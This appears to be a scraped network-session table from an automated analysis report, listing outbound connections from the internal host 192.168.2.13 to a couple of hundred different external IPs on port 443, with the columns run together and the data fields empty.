                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22163192.168.2.1351686208.150.101.100443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22164192.168.2.135598877.246.100.103443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22165192.168.2.135548638.254.31.92443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22166192.168.2.1343102105.180.103.44443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22167192.168.2.1334054153.30.67.214443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22168192.168.2.1358076222.94.243.75443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22169192.168.2.134256018.216.103.223443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22170192.168.2.13572202.208.176.61443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22171192.168.2.1359224197.60.186.192443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22172192.168.2.1357234106.93.11.111443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22173192.168.2.1342278190.67.18.237443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22174192.168.2.1343850204.178.16.252443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22175192.168.2.1343224125.164.198.222443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22176192.168.2.134018244.70.230.105443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22177192.168.2.134643087.54.123.64443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22178192.168.2.1342804163.161.26.123443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22179192.168.2.1348766182.78.184.45443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22180192.168.2.134503232.150.157.219443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22181192.168.2.136021680.127.242.5443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22182192.168.2.1348580146.218.58.107443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22183192.168.2.1345494169.233.73.59443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22184192.168.2.1359202172.14.221.170443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22185192.168.2.1345240192.59.118.97443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22186192.168.2.1347422133.255.207.108443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22187192.168.2.1358238168.241.61.23443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22188192.168.2.133890498.130.196.212443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22189192.168.2.135630696.77.223.225443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22190192.168.2.1332878155.200.171.253443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22191192.168.2.133856287.130.161.215443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22192192.168.2.135041663.134.93.246443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22193192.168.2.133503277.146.121.16443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22194192.168.2.1342002122.106.37.209443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22195192.168.2.1351130149.153.109.36443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22196192.168.2.1346036101.27.43.162443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22197192.168.2.134178642.175.198.128443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22198192.168.2.133637453.93.223.73443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22199192.168.2.133790488.8.39.16443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22200192.168.2.135000653.51.170.201443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22201192.168.2.1355942126.226.68.170443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22202192.168.2.135096665.200.32.6443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22203192.168.2.1349424170.147.188.106443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22204192.168.2.1354758196.248.123.191443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22205192.168.2.1344060115.98.38.47443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22206192.168.2.133370431.170.104.237443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22207192.168.2.134389452.123.118.180443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22208192.168.2.1357480139.79.203.208443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22209192.168.2.1348402174.149.212.179443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22210192.168.2.135954490.97.232.244443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22211192.168.2.1349184139.201.221.88443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22212192.168.2.1354378193.109.166.58443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22213192.168.2.1350902126.66.166.26443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22214192.168.2.1334510193.22.242.199443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22215192.168.2.1333352155.224.231.207443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22216192.168.2.1358310180.154.115.199443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22217192.168.2.1348644107.45.90.248443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22218192.168.2.1340206203.242.4.218443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22219192.168.2.1333784153.103.188.181443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22220192.168.2.1337994164.74.196.61443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22221192.168.2.1344130202.172.75.32443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22222192.168.2.135720678.206.148.7443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22223192.168.2.135544283.48.151.62443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22224192.168.2.135936454.78.62.138443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22225192.168.2.1352600175.242.197.193443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22226192.168.2.1352626137.195.105.112443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22227192.168.2.135035097.40.64.108443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22228192.168.2.1343816208.189.250.187443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22229192.168.2.133477685.241.198.73443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22230192.168.2.1352224150.41.16.123443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22231192.168.2.1344640179.76.22.3443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22232192.168.2.134412661.67.163.50443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22233192.168.2.1338416184.236.252.167443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22234192.168.2.134508240.105.207.99443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22235192.168.2.1359818139.173.108.127443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22236192.168.2.1352562210.7.115.3443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22237192.168.2.1352374168.70.211.201443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22238192.168.2.134273442.95.228.163443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22239192.168.2.1338274144.125.247.190443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22240192.168.2.134903048.183.100.154443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22241192.168.2.1360646103.66.81.17443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22242192.168.2.1335514208.19.251.228443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22243192.168.2.1351244186.2.135.44443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22244192.168.2.133339019.210.85.144443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22245192.168.2.134531651.60.136.99443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22246192.168.2.134272879.185.232.22443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22247192.168.2.1358874113.145.91.219443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22248192.168.2.133652665.106.99.42443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22249192.168.2.135001238.177.126.67443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22250192.168.2.136051490.75.161.137443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22251192.168.2.134222491.158.133.52443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22252192.168.2.1345414157.85.151.7443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22253192.168.2.134838663.248.198.222443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22254192.168.2.1347374128.72.158.98443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22255192.168.2.1346460191.63.132.199443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22256192.168.2.1345278173.253.227.19443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22257192.168.2.1354492111.49.129.190443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22258192.168.2.13411724.68.59.254443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22259192.168.2.134206275.213.59.13443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22260192.168.2.134874450.58.27.159443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22261192.168.2.1334052112.122.62.177443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22262192.168.2.13420882.235.37.209443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22263192.168.2.1356106198.86.182.181443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22264192.168.2.1360536212.137.101.55443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22265192.168.2.1343986170.220.246.183443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22266192.168.2.1353882180.233.181.111443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22267192.168.2.135031614.48.159.244443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22268192.168.2.133966253.63.170.141443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22269192.168.2.133850691.189.143.97443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22270192.168.2.1358212220.235.175.195443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22271192.168.2.1350382174.175.5.89443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22272192.168.2.1344404189.56.115.141443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22273192.168.2.1344580199.3.188.198443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22274192.168.2.1354856137.85.158.72443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22275192.168.2.1353324204.101.99.225443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22276192.168.2.1346994169.218.89.176443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22277192.168.2.1333974191.236.184.247443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22278192.168.2.135570288.204.27.75443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22279192.168.2.134256858.61.101.85443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22280192.168.2.133951468.143.253.187443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22281192.168.2.135176420.93.141.77443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22282192.168.2.1343086198.253.101.61443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22283192.168.2.133912824.174.155.114443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22284192.168.2.1352998159.114.208.158443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22285192.168.2.1333522165.192.203.69443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22286192.168.2.135191614.10.29.206443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22287192.168.2.1350992103.32.69.195443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22288192.168.2.1335710164.47.16.11443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22289192.168.2.133397475.173.22.252443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22290192.168.2.1352862205.57.127.211443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22291192.168.2.135023036.123.147.201443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22292192.168.2.133277052.201.230.157443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22293192.168.2.1341954213.92.155.78443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22294192.168.2.1340782129.95.160.54443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22295192.168.2.134659446.98.209.131443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22296192.168.2.135886089.113.228.155443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22297192.168.2.135826434.208.12.26443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22298192.168.2.1358472216.72.108.120443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22299192.168.2.1355848103.236.205.177443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22300192.168.2.1338504102.171.193.252443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22301192.168.2.133944254.162.48.136443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22302192.168.2.13449949.48.126.171443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22303192.168.2.1353204201.23.20.67443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22304192.168.2.1338722120.50.188.177443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22305192.168.2.134798466.250.43.221443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22306192.168.2.1341732170.240.166.116443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22307192.168.2.134481419.12.209.216443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22308192.168.2.1334192119.239.204.50443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22309192.168.2.1348282186.132.36.107443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22310192.168.2.134904041.174.213.48443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22311192.168.2.135035654.156.31.127443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22312192.168.2.133723048.85.175.240443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22313192.168.2.1340206175.144.207.124443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22314192.168.2.1358990142.176.89.129443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22315192.168.2.1360184138.164.188.66443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22316192.168.2.1353918187.158.99.102443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22317192.168.2.1340048157.5.142.136443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22318192.168.2.133420494.130.180.250443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22319192.168.2.134587696.181.246.246443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22320192.168.2.134853698.48.5.230443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22321192.168.2.1338244157.128.123.175443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22322192.168.2.1356642154.219.209.180443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22323192.168.2.134941683.56.72.128443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22324192.168.2.1356868201.235.48.125443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22325192.168.2.13505405.188.142.116443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22326192.168.2.1338234167.82.49.22443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22327192.168.2.1333118129.233.59.40443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22328192.168.2.1347328113.150.240.112443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22329192.168.2.1335296157.235.127.220443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22330192.168.2.1337568111.117.18.149443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22331192.168.2.1333690189.52.147.18443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22332192.168.2.1346310121.121.94.30443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22333192.168.2.1333424152.130.232.14443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22334192.168.2.1351066177.247.40.229443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22335192.168.2.1355262194.155.134.220443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22336192.168.2.1344732148.15.0.151443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22337192.168.2.134221665.203.136.179443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22338192.168.2.1360224111.158.186.122443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22339192.168.2.133519249.246.39.119443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22340192.168.2.135914041.121.155.139443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22341192.168.2.133286886.188.214.89443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22342192.168.2.1350304160.100.169.52443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22343192.168.2.134394686.21.3.229443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22344192.168.2.1357230162.210.200.213443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22345192.168.2.1354612112.124.71.61443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22346192.168.2.1339936170.54.147.248443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22347192.168.2.1343996154.204.253.215443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22348192.168.2.1344326222.66.185.195443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22349192.168.2.1334244183.37.102.239443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22350192.168.2.133714077.37.0.36443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22351192.168.2.1340958132.72.68.48443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22352192.168.2.1353940125.24.16.25443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22353192.168.2.1338420219.215.48.58443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22354192.168.2.134002679.54.230.220443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22355192.168.2.135425469.179.199.224443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22356192.168.2.1334570106.112.145.144443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22357192.168.2.135082267.212.217.184443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22358192.168.2.134983253.243.13.206443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22359192.168.2.1358212121.121.36.75443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22360192.168.2.134908648.231.237.48443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22361192.168.2.1337044113.173.0.174443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22362192.168.2.133973866.4.7.172443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22363192.168.2.1333648213.223.73.163443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22364192.168.2.1355742106.33.189.88443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22365192.168.2.1333270193.244.174.241443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22366192.168.2.134084817.36.47.126443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22367192.168.2.134055669.180.50.143443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22368192.168.2.1355882115.249.254.69443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22369192.168.2.1335858114.58.117.161443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22370192.168.2.1335610129.193.162.55443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22371192.168.2.1342970155.123.77.0443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22372192.168.2.134337487.90.20.240443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22373192.168.2.1359246183.190.203.58443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22374192.168.2.134715297.5.152.194443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22375192.168.2.1335632179.128.54.119443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22376192.168.2.1340634189.94.186.108443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22377192.168.2.1346122171.40.182.54443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22378192.168.2.1339464116.180.15.251443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22379192.168.2.133887681.27.246.116443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22380192.168.2.1335898142.161.52.187443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22381192.168.2.136062434.225.205.202443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22382192.168.2.1351540184.193.202.124443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22383192.168.2.1352774157.113.0.205443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
